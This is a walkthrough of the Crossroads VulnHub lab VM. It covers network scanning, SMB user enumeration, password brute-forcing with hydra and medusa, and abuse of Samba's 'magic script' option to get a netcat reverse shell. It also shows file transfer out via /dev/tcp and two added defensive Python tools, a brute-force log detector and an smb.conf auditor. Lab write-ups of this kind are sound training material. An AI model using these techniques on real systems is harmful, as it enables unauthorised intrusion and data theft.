Crossroads
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.98.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c4:83:a7 1 60 PCS Systemtechnik GmbH
192.168.56.181 08:00:27:b8:0e:1f 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.181
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.181 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 06:45 EST
Nmap scan report for bogon (192.168.56.181)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B8:0E:1F (Oracle VirtualBox virtual NIC)
Service Info: Host: CROSSROADS
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2022-11-16T05:46:02-06:00
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-16T11:46:02
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
The target host has three open ports: 80 (http), and the other two (139 and 445) are Samba.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient -L 192.168.56.181
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbshare Disk
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP CROSSROADS
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient //192.168.56.181/smbshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
└─$ enum4linux 192.168.56.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 16 06:50:29 2022
=========================================( Target Information )=========================================
Target ........... 192.168.56.181
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.181 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.56.181 )===============================
Looking up status of 192.168.56.181
CROSSROADS <00> - B <ACTIVE> Workstation Service
CROSSROADS <03> - B <ACTIVE> Messenger Service
CROSSROADS <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\albert (Local User)
[+] Enumerating users using SID S-1-5-21-198007098-3908253677-2746664996 and logon username '', password ''
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
Found the username albert
Next, take a look at port 80
From the page source, the target site is running WordPress
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/robots.txt
User-agent: *
Disallow: /crossroads.png
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ wget http://192.168.56.181/crossroads.png
--2022-11-16 06:55:46-- http://192.168.56.181/crossroads.png
Connecting to 192.168.56.181:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100255 (1.0M) [image/png]
Saving to: ‘crossroads.png’
crossroads.png 100%[================================================================================================================================>] 1.05M --.-KB/s in 0.02s
2022-11-16 06:55:46 (68.9 MB/s) - ‘crossroads.png’ saved [1100255/1100255]
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ steghide extract -sf crossroads.png
Enter passphrase:
steghide: the file format of the file "crossroads.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegseek crossroads.png /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "crossroads.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.181
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/16 06:57:15 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 217109 / 220561 (98.43%)===============================================================
2022/11/16 06:57:44 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ dirb http://192.168.56.181
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 16 06:57:55 2022
URL_BASE: http://192.168.56.181/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.181/ ----
+ http://192.168.56.181/index.html (CODE:200|SIZE:93075)
+ http://192.168.56.181/robots.txt (CODE:200|SIZE:42)
+ http://192.168.56.181/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Wed Nov 16 06:57:56 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.181
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2022/11/16 06:58:12 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 93075]
/robots.txt (Status: 200) [Size: 42]
/note.txt (Status: 200) [Size: 108]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099489 / 1102805 (99.70%)===============================================================
2022/11/16 07:00:41 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu
Not sure what that means, so go back to cracking SMB, since the username is already known
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ hydra -l albert -P /usr/share/wordlists/rockyou.txt smb://192.168.56.181
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-16 07:05:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.181:445/
[STATUS] 5065.00 tries/min, 5065 tries in 00:01h, 14339334 to do in 47:12h, 1 active
[STATUS] 5236.67 tries/min, 15710 tries in 00:03h, 14328689 to do in 45:37h, 1 active
[STATUS] 5268.00 tries/min, 36876 tries in 00:07h, 14307523 to do in 45:16h, 1 active
[STATUS] 5246.70 tries/min, 78788 tries in 00:15h, 14265611 to do in 45:19h, 1 active
[STATUS] 5231.90 tries/min, 162276 tries in 00:31h, 14182123 to do in 45:11h, 1 active
[STATUS] 5222.51 tries/min, 245545 tries in 00:47h, 14098854 to do in 44:60h, 1 active
^C
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Nothing was cracked; judging from other people's writeups, medusa is needed
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ medusa -h 192.168.56.181 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 12345 (2 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456789 (3 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: password (4 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: iloveyou (5 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: princess (6 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 1234567 (7 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: bradley1 (3842 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.56.181 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]
The password was cracked very quickly: bradley1 (clearly you can't rely on a single tool)
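Hydra's 5,000 tries a minute and medusa's hit on attempt 3842 are exactly the burst a Samba auth log records. As an added example (not part of the original writeup), this Python detector parses lines modelled on Samba's auth_audit messages (constructed here, reusing the Kali and target addresses from the session) and raises one alert when failures from a single host against one user cross a threshold, and a second when a success follows that burst:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Regex for the fields of a Samba auth_audit line that matter for detection.
AUTH_RE = re.compile(
    r"Auth: \[(?P<proto>[^\]]+)\] user \[(?P<dom>[^\]]*)\]\\\[(?P<user>[^\]]*)\] "
    r"at \[(?P<ts>[^\]]+)\] with \[(?P<method>[^\]]+)\] status \[(?P<status>[^\]]+)\] "
    r"workstation \[(?P<ws>[^\]]*)\] remote host \[ipv4:(?P<ip>[\d.]+):\d+\]"
)

def parse_line(line):
    """Return the auth event in a log line as a dict, or None for other lines."""
    m = AUTH_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a, %d %b %Y %H:%M:%S.%f UTC")
    return {"user": m.group("user"), "ip": m.group("ip"),
            "status": m.group("status"), "ts": ts}

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window counter keyed by (remote ip, user).
    Emits BRUTE_FORCE once when `threshold` failures land inside `window`,
    and SUCCESS_AFTER_BURST if that same key later authenticates successfully."""
    failures = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    bursting, alerts = set(), []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["ip"], ev["user"])
        if ev["status"] == "NT_STATUS_OK":
            if key in bursting:
                alerts.append(("SUCCESS_AFTER_BURST", ev["ip"], ev["user"], ev["ts"]))
            continue
        q = failures[key]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop failures that left the window
            q.popleft()
        if len(q) >= threshold and key not in bursting:
            bursting.add(key)
            alerts.append(("BRUTE_FORCE", ev["ip"], ev["user"], ev["ts"]))
    return alerts

# --- constructed sample, formatted like Samba's auth_audit output -----------
def _auth_line(user, ts, status, ip):
    stamp = ts.strftime("%a, %d %b %Y %H:%M:%S.%f") + " UTC"
    return (f"Auth: [SMB2,(null)] user [WORKGROUP]\\[{user}] at [{stamp}] with [NTLMv2] "
            f"status [{status}] workstation [KALI] remote host [ipv4:{ip}:49152] "
            f"mapped to [WORKGROUP]\\[{user}].")

_T0 = datetime(2022, 11, 16, 12, 5, 8)
SAMPLE_LINES = (
    # one mistyped password from another host, well before the attack: no alert
    [_auth_line("albert", _T0 - timedelta(minutes=5), "NT_STATUS_WRONG_PASSWORD", "192.168.56.1")]
    # seven wrong passwords from the Kali box within ~80 ms, as medusa would produce
    + [_auth_line("albert", _T0 + timedelta(milliseconds=12 * i), "NT_STATUS_WRONG_PASSWORD",
                  "192.168.56.137") for i in range(7)]
    # then the credential lands
    + [_auth_line("albert", _T0 + timedelta(milliseconds=100), "NT_STATUS_OK", "192.168.56.137")]
    + ["smbd[1234]: unrelated line that the parser must skip"]
)

def run_sample():
    return detect_bruteforce(SAMPLE_LINES)

if __name__ == "__main__":
    for alert in run_sample():
        print(*alert)
```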
Medusa's supported module names are found under:
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ find / -name *medusa* 2>/dev/null
/usr/lib/x86_64-linux-gnu/medusa
/usr/lib/python3/dist-packages/faraday_plugins/plugins/repo/medusa
/usr/bin/medusa
/usr/share/bash-completion/completions/medusa
/usr/share/doc/medusa
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ cd /usr/lib/x86_64-linux-gnu/medusa
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ ls
modules
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ cd modules
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls -alh | grep smb
-rwxr-xr-x 1 root root 42K May 15 2022 smbnt.mod
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls
cvs.mod http.mod mssql.mod nntp.mod pop3.mod rexec.mod rsh.mod smtp.mod snmp.mod svn.mod vmauthd.mod web-form.mod
ftp.mod imap.mod mysql.mod pcanywhere.mod postgres.mod rlogin.mod smbnt.mod smtp-vrfy.mod ssh.mod telnet.mod vnc.mod wrapper.mod
Next, log in to SMB with the password cracked above
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
[sudo] password for kali:
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 2 17:16:13 2021
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> get smb.conf
getting file \smb.conf of size 8779 as smb.conf (4286.4 KiloBytes/sec) (average 4286.6 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png hydra.restore nmap_full_scan smb.conf
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ cat smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
logging = file
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap config * : backend = tdb
; idmap config * : range = 3000-7999
; idmap config YOURDOMAINHERE : backend = tdb
; idmap config YOURDOMAINHERE : range = 100000-999999
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 means that usershare is disabled.
# usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
[homes]
comment = Home Directories
browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[smbshare]
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
A magic script option is present; online explanations say the script named by magic script gets executed when the shared folder is opened. So we write a script and upload it to this folder.
First start a listener on Kali, then connect to the target over SMB and put the script; during the put, the shell is bounced back to Kali
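Samba's magic script option runs the named file as the connected user when a client closes it, so on a writable share an upload of that name becomes code execution. As an added example that is not part of the original post, this Python audit parses an smb.conf (a constructed excerpt mirroring the [global] and [smbshare] settings recovered above) and flags that combination together with the guest-related settings:

```python
import re

# Constructed excerpt mirroring the [global] and [smbshare] settings recovered
# from the target's smb.conf above; the other shares are omitted for brevity.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = bad user
   usershare allow guests = yes
;  interfaces = 127.0.0.0/8 eth0
[homes]
   comment = Home Directories
   browseable = no
   read only = yes
   valid users = %S
[smbshare]
   path = /home/albert/smbshare
   valid users = albert
   browsable = yes
   writable = yes
   read only = no
   magic script = smbscript.sh
   guest ok = no
"""

def parse_smb_conf(text):
    """Minimal smb.conf reader: [section] headers, 'key = value' lines,
    '#'/';' comment lines skipped, keys lower-cased with whitespace collapsed.
    Samba's %-substitutions are kept verbatim; 'include' is not followed."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, val = line.partition("=")
            conf[section][" ".join(key.lower().split())] = val.strip()
    return conf

def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def is_writable(share):
    """'writable'/'writeable' are Samba synonyms for the inverse of 'read only'.
    Simplification: the share counts as writable if any of them says so
    (Samba itself lets the last one listed win)."""
    if _yes(share.get("writable", "no")) or _yes(share.get("writeable", "no")):
        return True
    return "read only" in share and not _yes(share["read only"])

def audit_smb_conf(conf):
    """Return (severity, section, message) findings for the risky settings."""
    findings = []
    g = conf.get("global", {})
    if _yes(g.get("usershare allow guests", "no")):
        findings.append(("MEDIUM", "global",
                         "usershare allow guests = yes: users may publish guest-accessible shares"))
    for name, share in conf.items():
        if name == "global":
            continue
        writable = is_writable(share)
        if "magic script" in share:
            # The server runs this file, as the connected user, when a client closes it;
            # on a writable share that turns any upload of that name into code execution.
            findings.append(("HIGH" if writable else "MEDIUM", name,
                             f"magic script = {share['magic script']} on a "
                             f"{'writable' if writable else 'read-only'} share"))
        if writable and _yes(share.get("guest ok", "no")):
            findings.append(("HIGH", name, "guest-writable share"))
    return findings

def audit_text(text):
    return audit_smb_conf(parse_smb_conf(text))

if __name__ == "__main__":
    for sev, section, msg in audit_text(SAMPLE_SMB_CONF):
        print(f"[{sev}] [{section}] {msg}")
```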
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 2 17:16:13 2021
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_UNSUCCESSFUL closing remote file \smbscript.sh
smb: \> ls
. D 0 Wed Nov 16 08:09:27 2022
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_IO_TIMEOUT closing remote file \smbscript.sh
smb: \>
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 36580
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
albert@crossroads:/home/albert/smbshare$
Successfully got a shell
Spawn another shell and download crossroads.png and the beroot file to Kali
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 8888 > cross.jpg
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 55362
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.6M
drwxr-xr-x 3 albert albert 4.0K Mar 6 2021 .
drwxr-xr-x 3 root root 4.0K Mar 2 2021 ..
-rwsr-xr-x 1 root root 17K Mar 2 2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar 2 2021 crossroads.png
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan 3 2021 user.txt
albert@crossroads:/home/albert$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
<$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
albert@crossroads:/home/albert$
Since steghide does not support PNG files, I looked at other people's writeups and found a new tool: stegoveritas
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo pip install stegoveritas
Collecting stegoveritas
Downloading stegoveritas-1.9.tar.gz (77 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 77.8/77.8 kB 177.6 kB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Collecting
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegoveritas cross.png
ERROR:StegoVeritas:Missing the following required packages: foremost, libexempi3
ERROR:StegoVeritas:Either install them manually or run 'stegoveritas_install_deps'.
Running Module: SVImage
+---------------------------+------+
| Image Format | Mode |
+---------------------------+------+
| Portable network graphics | RGBA |
+---------------------------+------+
ERROR:stegoveritas.helpers:not supported for this image mode
ERROR:stegoveritas.helpers:
""" apng
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 1668605655.125798-bcffc227ec961d9a422307bc56aa9f80 1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd 1668605662.1177938-deacfe6927ff1e957b146f28457567cf
1668605635.4692078-cdaac7888d6459d35735a7a017745968 1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb 1668605659.3538682-7aabde43efa4d275e91debe133aa8673 1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765 1668605657.028825-c3d9ec0541be0e353038bbaa263d8406 1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156 29
1668605654.491967-2c2e9e198566dca626c518c23661cabc 1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4 1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1 29.zlib
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd
/home/kali/Vulnhub/Crossroads/results/keepers
Only the first file looks like a password dictionary; rename it and upload it to the target host
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ mv 1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 passlist
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
